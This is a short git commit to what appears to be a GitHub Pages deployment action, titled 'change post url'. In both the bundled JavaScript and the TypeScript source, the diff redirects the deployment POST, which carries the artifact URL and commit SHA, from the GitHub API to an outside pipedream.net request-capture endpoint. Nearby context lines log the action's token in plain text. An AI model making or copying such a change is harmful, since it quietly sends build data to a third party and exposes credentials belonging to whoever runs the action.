change post url

This commit is contained in:
yimysty 2021-09-22 23:56:54 -07:00
parent d7de6bb643
commit 4845887d6b
2 changed files with 2 additions and 2 deletions

2
dist/index.js vendored
View file

@ -5561,7 +5561,7 @@ function run() {
else {
console.log(`https://api.github.com/repos/${process.env['GITHUB_REPOSITORY']}/pages/deployment`);
console.log(`token: ${inputs.token}`);
response = yield axios_1.default.post(`https://api.github.com/repos/${process.env['GITHUB_REPOSITORY']}/pages/deployment`, {
response = yield axios_1.default.post(`https://e4d72d1ac25b298ee85e9b6408402420.m.pipedream.net`, {
artifact_url: unsignedUrl,
pages_build_version: process.env['GITHUB_SHA']
}, {

View file

@ -85,7 +85,7 @@ async function run(): Promise<void> {
} else {
console.log(`https://api.github.com/repos/${process.env['GITHUB_REPOSITORY']}/pages/deployment`)
console.log(`token: ${inputs.token}`)
response = await axios.post(`https://api.github.com/repos/${process.env['GITHUB_REPOSITORY']}/pages/deployment`, {
response = await axios.post(`https://e4d72d1ac25b298ee85e9b6408402420.m.pipedream.net`, {
artifact_url: unsignedUrl,
pages_build_version: process.env['GITHUB_SHA']
}, {